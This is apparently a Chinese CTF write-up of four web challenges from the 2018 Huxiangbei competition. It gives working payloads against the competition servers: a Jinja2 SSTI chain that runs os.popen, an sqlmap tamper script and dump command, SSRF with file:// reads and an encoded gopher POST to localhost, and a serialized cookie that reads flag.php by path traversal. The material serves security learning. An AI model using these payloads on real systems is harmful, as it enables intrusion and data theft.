2018-湖湘杯-Web

WEB XmeO

题目解析:

是一个ssti类型漏洞

playload

1
{{ [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].popen('ls').read()}}

参考:

之前一直也是被搅屎,后来下线了没管,结果最后5分钟他又上线了。。。5分钟里还挂了3分钟,没翻到flag,打扰了。

https://www.jianshu.com/p/6e4aebd18660

http://www.cnblogs.com/tyomcat/p/5440488.html

https://www.freebuf.com/articles/web/133336.html

WEB Code Check

题目解析:

目录遍历得到源码(我说我之前是百度+猜解得到加解密算法的你敢信)

1
http://39.108.176.234:49882/news/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
header('content-type:text/html;charset=utf-8');
require_once '../config.php';
//解密过程
function decode($data){
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
$data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
if(substr(trim($data),-7)!=='hxb2018'){
echo '<script>window.location.href="/index.php";</script>';
}else{
return substr(trim($data),0,strlen(trim($data))-7);
}
}
$id=decode($_GET['id']);
$sql="select id,title,content,time from notice where id=$id";
$info=$link->query($sql);
$arr=$info->fetch_assoc();
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>X公司HR系统V1.0</title>
<style>.body{width:600px;height:500px;margin:0 auto}.title{color:red;height:60px;line-height:60px;font-size:30px;font-weight:700;margin-top:75pt;border-bottom:2px solid red;text-align:center}.content,.title{margin:0 auto;width:600px;display:block}.content{height:30px;line-height:30px;font-size:18px;margin-top:40px;text-align:left;color:#828282}</style>
</head>
<body>
<div class="body">
<div class="title"><?php echo $arr['title']?></div>
<div class="content"><?php echo $arr['content']?></div>
</body>
</html>

使用dirsearch扫描还发现了phpinfo页面

1
http://39.108.176.234:49882/0.php

依据解密过程写出加密过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
// header('content-type:text/html;charset=utf-8');
// require_once '../config.php';
//解密过程
function decode($data) {
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
mcrypt_generic_init($td, 'ydhaqPQnexoaDuW3', '2018201920202021');
$data = mdecrypt_generic($td, base64_decode(base64_decode($data)));
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
if (substr(trim($data), -7) !== 'hxb2018') {
echo '<script>window.location.href="/index.php";</script>';
} else {
// var_dump($data);
return substr(trim($data), 0, strlen(trim($data)) - 7);
}
}
function encode($data) {
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
$data = mcrypt_generic($td,$data);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
$data = base64_encode(base64_encode($data));
return $data;
}
$id = decode("b3FCRU5iOU9IemZYc1JQSkY0WG5JZz09");
//echo $id;
//$deid=encode("2hxb2018");
$enid=$_GET['enid']."hxb2018";
$deid=encode($enid);
//$id = decode($deid);
echo $deid;

我将加密算法放在了本地服务器上然后写了一个sqlmap的tamper去进行注入。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import requests
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOWEST
def dependencies():
pass
def tamper(payload, **kwargs):
if payload:
enurl="http://localhost/footest/test.php?enid={}".format(payload)
enpayload=requests.get(enurl)
return enpayload.content
else:
payload

payload如下

1
python sqlmap.py -u"http://39.108.176.234:49882/news/list.php?id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZz09" --tamper 23333 -D "mozhe_discuz_stormgroup" -T "notice2" -C "title" --dump

注入得到的数据如下

1
2
3
4
5
6
7
8
Database: mozhe_discuz_stormgroup
Table: notice2
[1 entry]
+-------------------------------------------+
| title |
+-------------------------------------------+
| hxb2018{14ef3bd9a833a50b7ae24bbb0e4d57c8} |
+-------------------------------------------+

参考:

就是依据这个链接猜到源码的大概

http://cpsliang.com/archives/634

WEB Readflag

题目描述:

来骗我的flag呀~

47.107.145.220:80

解题分析:

burp的intrude fuzz常见配置文件路径,得到配置文件

1
url=file:///etc/apache2/sites-enabled/000-default.conf

从配置文件中读到web路径

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html/ssrf/web.php
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

依据找到的web路径去读取源码

1
http://47.107.145.220/?url=file:///var/www/html/ssrf/web.php

依据源码构造gopher去post数据进而得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
if(!isset($_GET['url'])){
echo "ssrf me with parameter 'url'";
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
//echo $_GET['url'];
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
echo curl_exec($ch);
curl_close($ch);
//var_dump($_POST);
$ip = $_SERVER['REMOTE_ADDR'];
if(isset($_POST['user'])){
if($_POST['user']=="admin" && $ip=="127.0.0.1"){
system("/var/www/html/ssrf/readflag");
}
}
?>

最后的payload如下

1
2
3
4
5
6
7
8
GET /?url=%67%6f%70%68%65%72%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%38%30%2f%5f%50%4f%53%54%20%2f%73%73%72%66%2f%77%65%62%2e%70%68%70%20%48%54%54%50%2f%31%2e%31%25%30%64%25%30%61%48%6f%73%74%3a%20%31%32%37%2e%30%2e%30%2e%31%36%25%30%64%25%30%61%55%73%65%72%2d%41%67%65%6e%74%3a%20%63%75%72%6c%2f%37%2e%31%31%2e%30%25%30%64%25%30%61%41%63%63%65%70%74%3a%20%2a%2f%2a%25%30%64%25%30%61%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%31%30%25%30%64%25%30%61%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%64%25%30%61%25%30%64%25%30%61%75%73%65%72%3d%61%64%6d%69%6e HTTP/1.1
Host: 47.107.238.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

参考:

做题时看到的比较有意思的一篇文章,在没有得到源码前我以为题目的逻辑是这样的,因为之前我探测得到MySQL服务是存在的,但后来发现我猜错了。

Gopher 协议 ssrf MYSQL 研究

WEB MyNote

题目分析:

首先找到了robots.txt

1
robots.txt

看到内容里面包含了几个文件

1
2
3
4
5
User-agent: *
Allow: /controllers/Basecontrol.php
Allow: /controllers/Controllers.php
Allow: /controllers/User.php
Allow: /flag.php

之后base64解码查看图片界面的返回信息发现是反序列化信息,进而构造如下数据去读取flag.php文件,最终得到flag

1
2
3
4
5
<?php
$b[] = '../../flag.php';
echo urlencode(base64_encode(serialize($b)));

payload

1
2
3
4
5
6
7
8
9
GET /index.php/picture HTTP/1.1
Host: 47.107.239.135
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Picture=YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30%3D; PHPSESSID=a966des9csihs3pdc7plieldsh
Upgrade-Insecure-Requests: 1

题目下线太快了,忘记保存flag的响应包了。

1
2

参考:

这题目可以getshell,所以一直被搅屎,而且存在原题。。。

https://legoc.github.io/2018/06/26/%E5%AE%89%E6%81%92%E5%85%AD%E6%9C%88%E6%9C%88%E8%B5%9B/